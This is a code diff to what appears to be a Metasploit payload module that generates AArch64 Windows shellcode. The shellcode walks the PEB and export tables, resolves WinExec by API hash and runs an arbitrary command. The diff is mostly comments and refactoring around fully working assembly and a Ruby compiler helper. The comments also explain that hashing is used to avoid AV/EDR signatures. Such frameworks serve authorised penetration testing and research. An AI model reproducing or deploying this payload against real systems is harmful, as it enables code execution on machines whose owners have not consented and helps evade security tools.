@@ -14,11 +14,17 @@ def initialize(info = {})
14
14
super (
15
15
merge_info (
16
16
info ,
17
- 'Name' => 'Windows AArch64 Execute Command' ,
18
- 'Description' => 'Execute an arbitrary command on AArch64 Windows. Based on original research from Alan Foster.' ,
17
+ 'Name' => 'Windows AArch64 Command Execution' ,
18
+ 'Description' => %q{
19
+ Executes an arbitrary command on a Windows on ARM (AArch64) target.
20
+ This payload is a foundational example of position-independent shellcode for the AArch64 architecture.
21
+ It dynamically resolves the address of the `WinExec` function from `kernel32.dll` by parsing the
22
+ Process Environment Block (PEB) and the module's Export Address Table (EAT) at runtime.
23
+ This technique avoids static imports and hardcoded function addresses, increasing resilience.
24
+ } ,
19
25
'Author' => [
20
26
'alanfoster' , # Original implementation and research
21
- 'Alexander "xaitax" Hagenah'
27
+ 'Alexander "xaitax" Hagenah' # Refactoring, Improvements and Optimization
22
28
] ,
23
29
'License' => MSF_LICENSE ,
24
30
'Platform' => 'win' ,
@@ -42,184 +48,224 @@ def generate(_opts = {})
42
48
# It is based on the alanfosters original implementation.
43
49
cmd_str = datastore [ 'CMD' ] || 'calc.exe'
44
50
asm = <<~EOF
45
- // Notes:
46
- // https://devblogs.microsoft.com/oldnewthing/20220822-00/?p=107032
47
- // https://devblogs.microsoft.com/oldnewthing/20220823-00/?p=107041
48
- // https://devblogs.microsoft.com/oldnewthing/20220824-00/?p=107043
51
+ // AArch64 Windows PIC Shellcode
52
+ // -----------------------------
53
+ // Key Registers:
54
+ // x0-x7: Arguments to functions and return values.
55
+ // x18: Pointer to the Thread Environment Block (TEB) in user mode.
56
+ // x29: Frame Pointer (FP).
57
+ // x30: Link Register (LR), holds the return address for function calls.
49
58
50
59
main:
51
60
// --- Function Prologue ---
52
- // Allocate 0xb0 (176) bytes on the stack, then store the old
53
- // frame pointer (x29) and link register (x30) at the new stack top.
61
+ // Establishes a stack frame according to the AArch64 ABI.
62
+ // Allocate 0xb0 (176) bytes on the stack for local variables, saved registers, and scratch space.
63
+ // Then store the caller's frame pointer (x29) and link register (x30) at the new stack top.
54
64
stp x29, x30, [sp, #-0xb0]!
55
- // Set the new frame pointer to the current stack pointer.
65
+ // Set our new frame pointer to the current stack pointer.
56
66
mov x29, sp
57
- // Save non-volatile registers we will be using to a known offset from our new frame .
67
+ // Save non-volatile registers (x19-x21) that we will modify .
58
68
stp x19, x20, [x29, #0x10]
59
69
str x21, [x29, #0x20]
60
70
61
71
// --- API Hash Setup ---
62
- // Load the pre-calculated custom hash for kernel32.dll!WinExec into w8.
72
+ // Load the pre-calculated hash for kernel32.dll!WinExec into register w8.
73
+ // Hashing avoids using literal strings ("WinExec") in the payload, which are
74
+ // common signatures for AV/EDR.
63
75
movz w8, #0x8b31
64
76
movk w8, #0x876f, lsl #16
65
77
66
78
api_call:
67
79
// --- PEB Traversal ---
68
- // Begin walking the Process Environment Block's module list to find loaded DLLs.
80
+ // This section finds the base address of loaded modules (DLLs) in a
81
+ // position-independent way by walking structures internal to the process.
69
82
// x18 on Windows AArch64 always points to the Thread Environment Block (TEB).
70
83
ldr x10, [x18, #0x60] // x10 = TEB->ProcessEnvironmentBlock (PEB)
71
84
ldr x10, [x10, #0x18] // x10 = PEB->Ldr
72
- ldr x10, [x10, #0x20] // x10 = PEB->Ldr.InMemoryOrderModuleList.Flink (first module)
85
+ ldr x10, [x10, #0x20] // x10 = PEB->Ldr.InMemoryOrderModuleList.Flink (points to first module entry )
73
86
74
87
next_mod:
75
88
// --- Module Name Hashing ---
76
- // The LDR_DATA_TABLE_ENTRY UNICODE_STRING for the name is at +0x48 .
77
- ldr x11, [x10, #0x50] // x11 = FullDllName.Buffer pointer
78
- ldr x12, [x10, #0x4a] // x12 = FullDllName.Length (USHORT)
89
+ // For each module, calculate a hash of its name to find kernel32.dll .
90
+ ldr x11, [x10, #0x50] // x11 = LDR_DATA_TABLE_ENTRY-> FullDllName.Buffer pointer
91
+ ldr x12, [x10, #0x4a] // x12 = LDR_DATA_TABLE_ENTRY-> FullDllName.Length (USHORT)
79
92
and x12, x12, #0xffff // Ensure we only have the 16-bit length
80
- movz w13, #0 // w13 = module hash accumulator
93
+ movz w13, #0 // w13 = module hash accumulator, zero it out.
81
94
loop_modname:
82
- // This hashing loop reads one byte at a time from a UTF-16 string.
83
- ldrb w14, [x11], #0x1 // Read a byte and post-increment pointer
84
- cmp w14, #97 // Compare with ASCII 'a' for case conversion
95
+ // This hashing loop reads one byte at a time from the UTF-16 DLL name.
96
+ // It only uses the ASCII part for hashing and handles case-insensitivity.
97
+ ldrb w14, [x11], #1 // Read a byte and post-increment the pointer
98
+ cmp w14, #97 // Compare with ASCII 'a'
85
99
b.lt not_lowercase
86
- sub w14, w14, #0x20 // Convert to uppercase
100
+ sub w14, w14, #0x20 // If lowercase, convert to uppercase
87
101
not_lowercase:
88
- ror w13, w13, #13 // Rotate hash accumulator
89
- add w13, w13, w14 // Add character to hash
90
- sub w12, w12, #1 // Decrement length
102
+ ror w13, w13, #13 // Rotate the hash accumulator right by 13 bits
103
+ add w13, w13, w14 // Add the character's byte value to the hash
104
+ sub w12, w12, #1 // Decrement length counter
91
105
cmp w12, wzr
92
106
b.gt loop_modname
93
- // These extra rotates are preserved from the original implementation.
107
+ // These extra rotates are preserved from the original implementation to match the target hash .
94
108
ror w13, w13, #13
95
109
ror w13, w13, #13
96
110
97
- // Save current state to our stack frame before parsing the export table.
98
- str x10, [x29, #0x30] // Save current module's LDR_DATA_TABLE_ENTRY pointer
99
- str x13, [x29, #0x38] // Save computed module hash
111
+ // Save the current module's context (its LDR_DATA_TABLE_ENTRY pointer and its computed hash)
112
+ // to our stack frame before we start parsing its export table.
113
+ str x10, [x29, #0x30]
114
+ str w13, [x29, #0x38]
100
115
101
116
// --- PE Export Table Traversal ---
102
- ldr x10, [x10, #0x20] // x10 = DllBase (module base address)
103
- ldr w11, [x10, #0x3c] // Get e_lfanew from DOS header
104
- add x11, x10, x11 // x11 = Address of PE (NT) Header
105
-
106
- // --- Implement PE64 Magic Number Check ---
107
- // This check ensures we only attempt to parse 64-bit PE modules,
108
- // avoiding crashes if a 32-bit (WoW64) module is encountered.
109
- // The PE32+ Magic (0x020B) is found at Optional Header +0x18.
110
- ldrh w14, [x11, #0x18] // Load the Magic number from Optional Header
111
- cmp w14, #0x020b // Compare with PE32+ magic value
112
- b.ne get_next_mod_loop // If not 0x020B, skip this module ( it's 32 -bit or invalid)
113
-
114
- ldr w11, [x11, 0x88] // Get Export Table RVA from Optional Header
115
- cmp x11, #0x0 // Check if an Export Table exists
116
- b.eq get_next_mod_loop
117
- add x11, x11, x10 // x11 = Export Table Virtual Address
117
+ ldr x10, [x10, #0x20] // x10 = DllBase (the module's base memory address)
118
+ ldr w11, [x10, #0x3c] // Get e_lfanew offset from the DOS header
119
+ add x11, x10, x11 // x11 = Address of the main PE (NT) Header
120
+
121
+ // --- PE64 Magic Number Check ---
122
+ // This check is a critical robustness feature. It ensures we only attempt to parse
123
+ // 64-bit PE modules, avoiding crashes if a 32-bit (WoW64) module is encountered.
124
+ // The PE32+ Magic (0x020B) is at Optional Header +0x18.
125
+ ldrh w14, [x11, #0x18] // Load the Magic number from the Optional Header
126
+ cmp w14, #0x020b // Compare with the PE32+ magic value for 64-bit
127
+ b.ne get_next_mod_loop // If it's not a 64 -bit module, skip it.
128
+
129
+ ldr w11, [x11, # 0x88] // Get Export Address Table (EAT) RVA from Optional Header
130
+ cmp x11, #0
131
+ b.eq get_next_mod_loop // If there's no EAT, skip this module.
132
+ add x11, x11, x10 // x11 = EAT Virtual Address
118
133
str x11, [x29, #0x40] // Save EAT address to the stack
119
- ldr w12, [x11, #0x18] // w12 = NumberOfNames
120
- ldr w13, [x11, #0x20] // w13 = AddressOfNames RVA
121
- add x13, x10, x13 // w13 = AddressOfNames VA
134
+ ldr w12, [x11, #0x18] // w12 = EAT. NumberOfNames
135
+ ldr w13, [x11, #0x20] // w13 = EAT. AddressOfNames RVA
136
+ add x13, x10, x13 // w13 = EAT. AddressOfNames Virtual Address
122
137
123
138
get_next_func:
139
+ // --- Function Name Hashing ---
140
+ // Loop through all function names in the EAT.
124
141
cmp w12, #0
125
- b.eq get_next_mod_loop // If all functions checked, move to the next module
126
- sub w12, w12, #1 // Search backwards through the export names
127
- mov x14, #0x4
128
- madd x15, x12, x14, x13 // Get address of name RVA from AddressOfNames array
129
- ldr w15, [x15] // w15 = RVA of function name string
130
- add x15, x10, x15 // x15 = VA of function name string
131
- movz x5, #0 // w5 = function hash accumulator
142
+ b.eq get_next_mod_loop // If all function names checked, move to the next module.
143
+ sub w12, w12, #1 // Decrement function counter (we search backwards)
144
+ mov x14, #4
145
+ madd x15, x12, x14, x13 // Calculate address of the current function name's RVA in the name array
146
+ ldr w15, [x15] // Get the RVA of the function name string
147
+ add x15, x10, x15 // x15 = VA of the function name string
148
+ movz x5, #0 // w5 = function hash accumulator, zero it out.
132
149
loop_funcname:
133
- ldrb w11, [x15], #0x1 // Load one byte of the ASCII function name
134
- ror w5, w5, #13 // Rotate hash
135
- add w5, w5, w11 // Add character to hash
150
+ ldrb w11, [x15], #1 // Load one byte of the ASCII function name
151
+ ror w5, w5, #13
152
+ add w5, w5, w11
136
153
cmp x11, #0
137
- b.ne loop_funcname // Loop until null terminator
138
- ldr w6, [x29, #0x38] // Retrieve module hash from stack
139
- add w6, w6, w5 // Add function hash
140
- cmp w6, w8 // Compare against target hash
141
- b.ne get_next_func
154
+ b.ne loop_funcname // Loop until the null terminator is hit.
155
+ funcname_hashed:
156
+ ldr w6, [x29, #0x38] // Retrieve the saved module hash from our stack frame
157
+ add w6, w6, w5 // Combined hash = module_hash + function_hash
158
+ cmp w6, w8 // Does this match our target hash (kernel32.dll!WinExec)?
159
+ b.ne get_next_func // If not, hash the next function name.
142
160
143
161
// --- Function Address Resolution ---
162
+ // We found the correct function name. Now, we find its actual address.
144
163
found_func:
145
164
ldr x11, [x29, #0x40] // Restore EAT address from stack
146
- ldr w13, [x11, #0x24] // Get AddressOfNameOrdinals RVA
147
- add x13, x10, x13
148
- mov x14, #0x2
149
- madd x15, x12, x14, x13 // Get address of the function's ordinal
150
- ldrh w15, [x15] // Get the 16-bit ordinal
151
- ldr w13, [x11, #0x1c] // Get AddressOfFunctions RVA
152
- add x13, x10, x13
153
- mov x14, #0x4
154
- madd x15, x15, x14, x13 // Get address of the function's RVA using the ordinal
155
- ldr w15, [x15]
156
- add x15, x15, x10 // x15 = Final VA of WinExec
165
+ ldr w13, [x11, #0x24] // Get EAT. AddressOfNameOrdinals RVA
166
+ add x13, x10, x13 // VA of the ordinal table
167
+ mov x14, #2
168
+ madd x15, x12, x14, x13 // Get address of our function's ordinal
169
+ ldrh w15, [x15] // Get the 16-bit ordinal value
170
+ ldr w13, [x11, #0x1c] // Get EAT. AddressOfFunctions RVA
171
+ add x13, x10, x13 // VA of the function address table
172
+ mov x14, #4
173
+ madd x15, x15, x14, x13 // Get address of the function's RVA from the address table using the ordinal
174
+ ldr w15, [x15] // Get the function's RVA
175
+ add x15, x15, x10 // x15 = Final Virtual Address of WinExec
157
176
158
177
finish:
159
178
// --- Call WinExec ---
160
- // Set up x9 to point to a scratch buffer on our stack for the command string .
179
+ // Set up x9 to point to a scratch buffer on our stack.
161
180
add x9, x29, #0x50
162
- // create_aarch64_string_in_stack places the pointer to the CMD in x0.
181
+ // create_aarch64_string_in_stack will write the command string to the
182
+ // address in x9 and place the final pointer to the string in x0.
163
183
#{ create_aarch64_string_in_stack ( cmd_str ) }
164
- mov w1, #1 // Arg2: uCmdShow = SW_SHOWNORMAL (1)
165
- mov x8, x15 // Move target function address for the call
166
- blr x8 // Branch with Link to Register (call WinExec)
184
+ mov w1, #1 // Arg2 ( uCmdShow) = SW_SHOWNORMAL (1) - Makes the new window visible.
185
+ mov x8, x15 // Move target function address into a volatile register for the call.
186
+ blr x8 // Branch with Link to Register (call WinExec).
167
187
168
188
// --- Function Epilogue ---
189
+ // Cleanly tears down the stack frame and returns execution to the caller.
169
190
epilogue:
170
- // Restore saved registers.
191
+ // Restore saved non-volatile registers from the stack frame .
171
192
ldp x19, x20, [x29, #0x10]
172
193
ldr x21, [x29, #0x20]
173
- // Restore the original stack pointer from our frame pointer .
194
+ // Restore the original stack pointer.
174
195
mov sp, x29
175
- // Restore the original frame pointer and link register, deallocating the stack.
196
+ // Restore the caller's frame pointer and link register, deallocating our stack frame in one instruction .
176
197
ldp x29, x30, [sp], #0xb0
177
- ret // Return to the caller .
198
+ ret // Return to the address stored in the Link Register .
178
199
179
- // --- Refined Loop Control ---
200
+ // --- Loop Control for Module Iteration ---
180
201
get_next_mod_loop:
181
202
// Restore the LDR_DATA_TABLE_ENTRY pointer from the stack.
182
203
ldr x10, [x29, #0x30]
183
- // Follow the Flink pointer to the next entry in the circular list.
204
+ // The InMemoryOrderModuleList is a circular doubly-linked list.
205
+ // Following the Flink pointer gets the next module in the list.
184
206
ldr x10, [x10]
185
- // Jump back to the start of the module processing loop .
207
+ // Jump back to begin processing this next module.
186
208
b next_mod
187
209
EOF
188
210
189
211
compile_aarch64 ( asm )
190
212
end
191
213
214
+ # Generates AArch64 assembly to write a given string to the stack and return a pointer to it.
215
+ # This is a classic shellcode technique to create strings in memory at runtime.
216
+ # @param string [String] The string to be placed on the stack.
217
+ # @return [String] A block of AArch64 assembly code.
192
218
def create_aarch64_string_in_stack ( string )
193
219
str = string + "\x00 "
194
- target = :x0
195
- stack = :x9
220
+ target = :x0 # The pointer to the string will be returned in x0 (first argument register).
221
+ stack = :x9 # x9 is used as a temporary pointer to write the string to the stack.
222
+
223
+ # Build the string 8 bytes at a time.
196
224
push_string = str . bytes . each_slice ( 8 ) . flat_map do |chunk |
225
+ # Load the 8-byte chunk into the target register using a sequence of movz/movk.
197
226
mov_instructions = chunk . each_slice ( 2 ) . with_index . map do |word , idx |
227
+ # NOTE: Chunks are reversed to build the little-endian value correctly in the register.
198
228
hex = word . reverse . map { |b | format ( '%02x' , b ) } . join
199
229
"mov#{ idx == 0 ? 'z' : 'k' } #{ target } , #0x#{ hex } #{ idx == 0 ? '' : ", lsl ##{ idx * 16 } " } "
200
230
end
231
+ # Store the 8-byte value from the register onto the stack and advance the stack pointer.
201
232
[ *mov_instructions , "str #{ target } , [#{ stack } ], #8" ]
202
233
end
234
+
235
+ # After writing, `stack` points just past the end of the string.
236
+ # We subtract the aligned size to get the pointer to the beginning of the string.
203
237
set_target_register = [
204
238
"mov #{ target } , #{ stack } " ,
205
239
"sub #{ target } , #{ target } , ##{ align ( str . bytesize ) } "
206
240
]
207
241
( push_string + set_target_register ) . join ( "\n " )
208
242
end
209
243
244
+ # Aligns a given value to a specified boundary (defaults to 8 bytes).
245
+ # @param value [Integer] The value to align.
246
+ # @param alignment [Integer] The alignment boundary.
247
+ # @return [Integer] The aligned value.
210
248
def align ( value , alignment : 8 )
211
249
return value if ( value % alignment ) . zero?
212
250
213
251
value + ( alignment - ( value % alignment ) )
214
252
end
215
253
254
+ # Compiles a string of AArch64 assembly into raw binary shellcode.
255
+ # @param asm_string [String] The assembly code.
256
+ # @return [String] The compiled binary shellcode.
216
257
def compile_aarch64 ( asm_string )
258
+ # This requires the 'aarch64' gem.
217
259
require 'aarch64/parser'
218
260
parser = ::AArch64 ::Parser . new
219
261
asm = parser . parse ( without_inline_comments ( asm_string ) )
220
262
asm . to_binary
221
263
end
222
264
265
+ # Removes all inline comments from an assembly string, as the aarch64
266
+ # gem parser does not support them.
267
+ # @param string [String] The assembly code with comments.
268
+ # @return [String] The assembly code without comments.
223
269
def without_inline_comments ( string )
224
270
string . lines . map { |line | line . split ( '//' , 2 ) . first . strip } . reject ( &:empty? ) . join ( "\n " )
225
271
end
0 commit comments